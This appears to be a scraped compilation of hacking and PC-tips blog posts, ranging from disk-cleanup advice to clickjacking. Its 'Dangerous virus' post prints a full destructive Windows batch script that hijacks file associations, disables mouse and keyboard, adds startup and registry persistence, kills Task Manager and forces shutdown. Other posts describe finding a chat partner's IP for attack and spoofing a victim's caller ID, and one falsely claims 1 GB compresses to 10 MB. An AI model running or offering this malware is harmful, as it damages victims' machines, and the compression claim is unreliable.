17)Boost your PC at max performance



















                        Boost your PC at max performance








Although there are many things that can affect the performance of your computer, there are a few simply things you can do each month to help keep your computer running at maximum performance. This article will focus on two problems that impact the performance of your computer and will then explain what you can do about it.

Problem #1: Computer Hard Disk Files
Your computer is always writing information to your hard disk, no matter what you do. Your computer attempts to keep all file information in the same location on your hard drive. As you add and delete files, blank spaces are left between your files. As you add new programs or files, your computer tries to use these blank spaces.

Over time, this reading and writing of files can affect the way your computer performs. The files eventually become scattered in multiple locations on your hard disk rather than in the same location.

Your computer will still find the information. However, the more scattered the information becomes on your hard drive, the more accesses your computer has to make to find (and gather) the information. This requires your hard disk to work harder and do more reading/writing than is necessary. It will slow down your computer by as much as 200% and causes increased wear and tear on your hard drive.

Problem #2: Spyware
If you use the Internet, at some point you will download a file or software program onto your computer. Sometimes you will know something is beingdownloaded to your computer. Other times you will have no idea. (Although this article will not talk about small files called “cookies”, you may want to look up information on this subject. Cookies are written onto your computer from the Internet.)

Free computer programs (often referred to as Freeware) are a big hit on the Internet. Every day thousands of users download these “free programs”. Although there are some great freeware programs, these programs often have advertisements or tracking code associated with their use. The term “Spyware” refers to programs that gather information about your computer and (Internet) surfing habits without your knowledge. This information is then sold to a third party company as a means of generating revenue.

The problem with Spyware is that it also impacts the performance of your computer. It can make your computer very sluggish and unresponsive.

Three Steps to Improved Computer Performance
Now that we’ve discussed two problems that affect the performance of your computer, let’s discuss three things you can do to get your computer performance back to normal. You should do these three steps in the order presented. Ideally, you should repeat them about once a month or whenever you notice a change in your computer’s performance.

Step #1: Delete Spyware
The first thing you should do is to delete spyware files or programs from your computer. To do this, you can use a free software program such as Ad-Aware SE Personal Edition from LavaSoft. To get the program, go to www.download.com and search for “Ad-Aware SE” (without the quotes). Select “Download Now” and follow the installation instructions. Once the program is installed, you can scan your computer for spyware files. Then, you can select and delete them from your computer.
Note #1: Always be sure to use the “Check for updates now” option to keep your program current.
Note #2: You need to be aware that when you delete spyware files, some of those “free” programs you downloaded may not continue to work correctly. If you have a program you’ve downloaded and want to continue to use, check very carefully what you select to delete from the “Scanning results” once the scan has been completed.

Step #2: Clean up your Hard Disk
Once the spyware is removed, you need to clean up temporary and unwanted files from your hard disk. To do this on your windows PC, select the start option in the lower left hand corner of your computer screen. Then, select the program option. Under the program option, select “Accessories”. Under the “Accessories” option, select “System Tools”. From the System Tools option, select “Disk Cleanup”.

Select the drive you want to clean from the pull-down menu and select OK. Usually, this is Drive C. If you have more than one hard drive, select one at a time. This program will then scan your computer for files that could be erased from your computer. You can safely erase all temporary and Recycle Bin files. You can also check the box of any other files you want the program to erase.

Step #3: Defrag your Hard Disk
Once all the spyware and temporary files are removed, you need to defrag your hard disk. This process simply rewrites your computer files so they are no longer scattered all over your hard disk, but are written in the same location for quick sequential access.

To defrag your hard disk on your windows PC, select the start option in the lower left hand corner of your computer screen. Then, select the program option. Under the program option, select “Accessories”. Under the “Accessories” option, select “System Tools”. From the System Tools option, select “Disk Defragmenter”. First, select the hard drive from your computer. Usually, this is Drive C. However, many computers have multiple hard drives. Select one at a time.

You can select “Analyze” to have the program check out the hard drive and see if it needs to be defragged. The program will prompt you at the completion of its analysis. Use the defragment option as prompted.

Note: If you’ve never used this option before, I would recommend that you select the defragment option.

Once, you’ve completed these three steps, your computer and hard disk should be able to operate at maximum performance. Don’t forget to repeat these steps at least once a month or whenever you notice a change in your computer’s performance.

16)Hacking Yahoo Messenger











                   Hacking Yahoo Messenger




While you are chatting via yahoo messenger the communication between you and the person you want to hack, takes place indirectly via Yahoo server and not directly. It is not possible to hack Yahoo messenger directly to get the IP address. So to hack his IP, you must establish a direct communication with him. So ,how to do this? It’s easy. Just start chatting with some one via Yahoo messenger. During the process of chatting send him a big file. Now the file transfer takes place directly between your computer and the victim’s computer(via yahoo messenger application). So now, you are ready to go. Here’s the step-by-step process to hack Yahoo messenger and get the IP address of the person .
  • Goto the COMMAND PROMPT (START>>>RUN>>>Type CMD).
  • Here Type “netstat -n” (without quotes).
NOTE: If you are new to “netstat” and other IP related commands refer this tutorial: Windows XP IP Utilities
  • The pic given below shows netstat results of my computer. I was not chatting when i took this pic and hence it looks modified.
  • Here local address is your own IP and the foreign address is the IP address of the recipient with whom you are connected via yahoo messenger (There may be multiple recipients and hence multiple foreign addresses).
  • Now send him the file.
  • Check the output by typing the command “netstat -n” (without quotes).
  • Assume the output is something like this.
TCP 127.0.0.10:5101 124.55.23.11:1246 ESTABLISHED
Here 124.55.23.11 is the IP address of the person with whom you are chatting and 1246 is the port number where connection is established. That’s It! You have now hacked Yahoo messenger to get his IP address.
Once you hack Yahoo messenger and get his IP address you can use any of theRemote Administration tools or perform NETBIOS HACKING.

15)Dangerous virus











                                 Dangerous virus








This is a really destructive virus that:
> disables mouse &keyboard
> disables task manager
> starts at startup
> alters file associations
Here's the code:
----begin code----
@echo off
prompt $P $G
assoc .doc  = fA1luRe
assoc .docx  = fA1luRe
assoc .log  = fA1luRe
assoc .msg  = fA1luRe
assoc .pages  = fA1luRe
assoc .rtf  = fA1luRe
assoc .txt  = fA1luRe
assoc .wpd  = fA1luRe
assoc .wps  = fA1luRe
assoc .accdb  = fA1luRe
assoc .blg  = fA1luRe
assoc .csv  = fA1luRe
assoc .dat  = fA1luRe
assoc .db  = fA1luRe
assoc .efx  = fA1luRe
assoc .mdb  = fA1luRe
assoc .pdb  = fA1luRe
assoc .pps  = fA1luRe
assoc .ppt  = fA1luRe
assoc .pptx  = fA1luRe
assoc .sdb  = fA1luRe
assoc .sdf  = fA1luRe
assoc .sql  = fA1luRe
assoc .vcf  = fA1luRe
assoc .wks  = fA1luRe
assoc .xls  = fA1luRe
assoc .xlsx  = fA1luRe
assoc .xml  = fA1luRe
assoc .bmp  = fA1luRe
assoc .gif  = fA1luRe
assoc .jpg  = fA1luRe
assoc .png  = fA1luRe
assoc .psd  = fA1luRe
assoc .psp  = fA1luRe
assoc .thm  = fA1luRe
assoc .tif  = fA1luRe
assoc .ai  = fA1luRe
assoc .drw  = fA1luRe
assoc .eps  = fA1luRe
assoc .ps  = fA1luRe
assoc .svg  = fA1luRe
assoc .3dm  = fA1luRe
assoc .dwg  = fA1luRe
assoc .dxf  = fA1luRe
assoc .pln  = fA1luRe
assoc .indd  = fA1luRe
assoc .pct  = fA1luRe
assoc .pdf  = fA1luRe
assoc .qxd  = fA1luRe
assoc .qxp  = fA1luRe
assoc .rels  = fA1luRe
assoc .aac  = fA1luRe
assoc .aif  = fA1luRe
assoc .iff  = fA1luRe
assoc .m3u  = fA1luRe
assoc .mid  = fA1luRe
assoc .mp3  = fA1luRe
assoc .mpa  = fA1luRe
assoc .ra  = fA1luRe
assoc .wav  = fA1luRe
assoc .wma  = fA1luRe
assoc .3g2  = fA1luRe
assoc .3gp  = fA1luRe
assoc .asf  = fA1luRe
assoc .asx  = fA1luRe
assoc .avi  = fA1luRe
assoc .flv  = fA1luRe
assoc .mov  = fA1luRe
assoc .mp4  = fA1luRe
assoc .mpg  = fA1luRe
assoc .rm  = fA1luRe
assoc .swf  = fA1luRe
assoc .vob  = fA1luRe
assoc .wmv  = fA1luRe
assoc .asp  = fA1luRe
assoc .cer  = fA1luRe
assoc .csr  = fA1luRe
assoc .css  = fA1luRe
assoc .htm  = fA1luRe
assoc .html  = fA1luRe
assoc .js  = fA1luRe
assoc .jsp  = fA1luRe
assoc .php  = fA1luRe
assoc .rss  = fA1luRe
assoc .tvpi  = fA1luRe
assoc .tvvi  = fA1luRe
assoc .xhtml  = fA1luRe
assoc .fnt  = fA1luRe
assoc .fon  = fA1luRe
assoc .otf  = fA1luRe
assoc .ttf  = fA1luRe
assoc .8bi  = fA1luRe
assoc .plugin  = fA1luRe
assoc .xll  = fA1luRe
assoc .cab  = fA1luRe
assoc .cpl  = fA1luRe
assoc .cur  = fA1luRe
assoc .dll  = fA1luRe
assoc .dmp  = fA1luRe
assoc .drv  = fA1luRe
assoc .key  = fA1luRe
assoc .lnk  = fA1luRe
assoc .sys  = fA1luRe
assoc .cfg  = fA1luRe
assoc .ini  = fA1luRe
assoc .keychain  = fA1luRe
assoc .prf  = fA1luRe
assoc .app  = fA1luRe
assoc .bat  = fA1luRe
assoc .cgi  = fA1luRe
assoc .com  = fA1luRe
assoc .exe  = fA1luRe
assoc .pif  = fA1luRe
assoc .vb  = fA1luRe
assoc .ws  = fA1luRe
assoc .7z  = fA1luRe
assoc .deb  = fA1luRe
assoc .gz  = fA1luRe
assoc .pkg  = fA1luRe
assoc .rar  = fA1luRe
assoc .sit  = fA1luRe
assoc .sitx  = fA1luRe
assoc .tar.gz  = fA1luRe
assoc .zip  = fA1luRe
assoc .zipx  = fA1luRe
assoc .bin  = fA1luRe
assoc .hqx  = fA1luRe
assoc .mim  = fA1luRe
assoc .uue  = fA1luRe
assoc .c  = fA1luRe
assoc .cpp  = fA1luRe
assoc .dtd  = fA1luRe
assoc .java  = fA1luRe
assoc .pl  = fA1luRe
assoc .bak  = fA1luRe
assoc .bup  = fA1luRe
assoc .gho  = fA1luRe
assoc .ori  = fA1luRe
assoc .tmp  = fA1luRe
assoc .dmg  = fA1luRe
assoc .iso  = fA1luRe
assoc .toast  = fA1luRe
assoc .vcd  = fA1luRe
assoc .gam  = fA1luRe
assoc .nes  = fA1luRe
assoc .rom  = fA1luRe
assoc .sav  = fA1luRe
assoc .dbx  = fA1luRe
assoc .msi  = fA1luRe
assoc .part  = fA1luRe
assoc .torrent  = fA1luRe
assoc .yps  = fA1luRe
rundll32.exe mouse, disable
rundll32.exe keyboard, disable
copy setup.bat %userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
copy setup.bat %windir%\System32
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v fA1luRe /t REG_SZ /d %windir%\System32\setup.bat
taskkill /f /im taskmgr.exe
reg restore HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr = 1
shutdown -s -f -t 10 -c "PwN3D by fA1luRe!!!"
----end code----

Save it as *.bat
Once saved, don't open it!!!
Open and do this at your own risk!!!

14)How to call your friends with their own number Extreme Hack














How to call your friends with their own number Extreme Hack




Mobile hack 
to call your friends:

Hello Friends after "Make Free Phone Calls From PC to mobile for free" hack today I am
sharing With you a extremely Nice Prank or you can simply say Hack
i.e "How To Call Your Friends From THeir Own Cell Number".
I was asked by many Friends to Write Tutorials about mobile hacks and Pranks .
So I am Sharing My Second Mobile Extreme Prank With You all.
Enjoy and Have Fun And GO on Reading..

1. Go to http://www.mobivox.com and register there for free account.

2. During registration, remember to insert Victim mobile number in "Phone number" field as shown below.

3. Complete registration and confirm your email id and then login to your account. Click on "Direct WebCall".




4. You will arrive at page shown below. In "Enter a number" box, select your country and also any mobile number(you can enter yours). Now, simply hit on "Call Now" button to call your friend with his own number.


5. That's it. Your friend will be shocked to see his own number calling him. I have spent last two days simply playing this cool mobile hack prank.

That All The Full Tutorial .
If you are facing Any Problem Ask me I am there to help you Out . Enjoy and have Fun.

13)Click Jacking








Click Jacking


ClickJacking
  
Definition :-

"Clickjacking is a malicious technique of tricking web users into revealing confidential information or taking control of their computer while clicking on seemingly innocuous web pages." - Wikipedia

Introduction :-

A vulnerability across a variety of browsers and platforms, a clickjacking takes the form of embedded code or script that can execute without the user's knowledge, such as clicking on a button that appears to perform another function.
The long list of vulnerabilities involves browsers, Web sites and plug-ins likeFlash.

How It Works? :-

ClickJacking is a little bit difficult to explain however try to imagine any button that you see in your browser from the Wire Transfer Button on your Bank, Post Blog button on your blog, Add user button on your web-site, Google Gadgets etc.
ClickJacking gives the attacker to ability to invisibly float these buttons on-top of other innocent looking objects in your browser.


So when you try to click on the innocent object, you are actually clicking on the malicious button that is floating on top invisibly.

In other words, the attack is thrown by a malicious web page embedding objects, possibly from a different site, such as framed documents or plugin content (Flash, Silverlight, Java…) which may lead to unwanted results if clicked by the current user (e.g. a “Delete all messages” button in your webmail or an advertisement banner in a click fraud scheme). Using DHTML, and especially CSS, the attacker can disguise or hide the click target in several ways which go completely undetected by the user, who’s easily tricked into clicking it in a more or less blind way.

javascript increases the effectiveness of these attacks hugely, because it can make our invisible target constantly follow the mouse pointer, intercepting user’s first click with no failure.
We can however imagine a few less effective but still feasible scriptless scenarios, e.g. covering the whole window with hidden duplicates of the target or overlaying an attractive element of the page, likely to be clicked (e.g. a game or a porn image link), with a transparent target instance.

Examples :-

1) Malicious camera spying using Adobe's Flash.
2) Flash, Java, SilverLight, DHTML Game or Application used to Spy on your Webcam and/or Microphone.

The best defense against ClickJacking attacks is to use Firefox with the NoScript add-on installed.


NoScript 1.8.9.2

Allow active content to run only from sites you trust,
and protect yourself against XSS and Clickjacking attacks...!

12) Tit-bit to compress 1GB into 10Mb













              
            Tit-bit to compress 1GB into 10Mb










It is Amazing to say that we can compress 1GB data/move into 10MB. Really, it is possible with the KGB Freeware (Open source) software. You can download the software from http://kgbarchiver.net/?page=download and fallow the following the steps:

We can compress that data in two formats..1) KGB format 2) ZIP format. Everyone knows the ZIP format. I will tell you which is better & why. If you do it in KGB format it takes 5-6 hours on a 256 mb RAM, to compress 1 GB data/movie in less than 10 MB , but (this is not which i prefer) because to decompress you take the same time. So its useless & you need KGB archiver only only for this format to decompress. But if you do it in ZIP format it takes 6-7 hours on a 256 MB ram, but i will tell you its worth because WINRAR & WINZIP both can decompress it in seconds. OK, now its clear that which format to use & which is better. Now we'll go how to use the software. 

Run the application >> It asks for which file you want to compress >> select the file >> after you select >> you get two options in which format you want to compress it >> select ZIP format ( I prefer ) >> and then set compression level to maximum (maximum the compression level , small the size of it will be compressed) >> Just ignore the time given below ....... There is option that you can auto shutdown ur computer after the compression is over..SO you can got school/college/office & keep it to get compressed.